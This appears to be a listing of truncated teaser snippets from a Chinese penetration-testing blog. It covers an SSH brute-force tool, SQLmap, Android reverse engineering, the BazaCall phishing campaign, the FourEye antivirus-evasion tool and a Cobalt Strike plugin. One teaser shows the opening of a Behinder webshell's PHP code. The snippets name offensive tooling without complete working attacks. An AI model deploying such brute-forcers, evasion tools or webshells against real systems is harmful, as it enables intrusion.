一个每日分享渗透小技巧的公众号大家好,这里是 大余安全 的第 128 篇文章,本公众号会每日分享攻防渗透技术给大家。靶机地址:https://www.hackt...
Shreder:一款功能强大的多线程SSH协议密码爆破工具
关于ShrederShreder是一款功能强大的多线程SSH协议密码爆破工具,广大研究人员可以使用Shreder对SSH协议的安全性进行探究。功能介绍能够快速执行密码爆破,每个密码仅需1秒;经过优化处...
渗透测试之SQLmap使用详解
目录:SQLmap介绍SqlMap是Python语言编写的开源的渗透测试工具,它可以自动探测和利用SQL 注入漏洞来接管数据库服务器支持的数据库:MySQL、Oracle、 Microsoft SQL...
安卓逆向--自吐算法(3DES和AES)
一、3DES源码String bs= "逆向有你a";DESedeKeySpec des3key = new DESedeKeySpec(("123456781234567812345678".get...
社会工程、邮件钓鱼、电话诈骗三管齐下--新型网络攻击BazaCall强势来袭
微软研究人员在7月29日发布的一份博客文章指出,一种勒索软件攻击新方式正在流行,利用虚假的呼叫中心诱使受害者下载恶意软件,可能比之前认为的更危险。由于恶意软件并不存在于邮件本身的链接或文档中,这种骗局...
Packer Fuzzer --一种快速高效的扫描器
每日分享好工具Packer Fuzzer 是一种快速高效的扫描器,用于对由 javascript 模块打包器(如 Webpack)构建的网站进行安全检测。一款针对Webpack等前端打包工具所构造的网...
免杀工具 -- FourEye
一、简介快速生成免杀exe可执行文件,目前拥有三种免杀的方法 二、下载及安装1、下载到本地git clone https://github.com/lengjibo/FourEye...
2021Kali -- Wireshark解密HTTPS数据包
一、安装谷歌浏览器1、下载安装包wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb2、安装gd...
安卓逆向 -- 算法基础(数字签名)
一、数字签名数字签名的基础是公钥和私钥的非对称加密,发送者使用私钥加密消息摘要(签名),接收者使用公钥解密消息摘要以验证签名是否是某个人的。常见的有MD5withRSA,SHA256withRSA二、...
可能是最实用的CS插件之一--梼杌
该项目仅供交流与学习使用,请勿用于非法用途!更新内容更新3.1(2020.7.28)1.信息收集模块增加杀软对比(对uknowsec师傅的SharpAVKB稍作修改,与Vulkey_Chen师傅的av...
小蜜蜂公益译文 -- NISTIR 8011 第4卷 安全控制评估自动化支持:软件漏洞管理(上)
概要NISTIR8011第4卷按步骤详细描述了安全控制措施的自动化评估过程,这些评估为特定评估范围(目标网络)内的漏洞管理提供了支持,并将结果应用于该网络内所有授权范围内的评估。还提供了一个流程用以评...
【奇技淫巧】冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远
冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远下面这个是默认的冰蝎马:<?php@error_reporting(0);session_start();if (isset($_GET['p...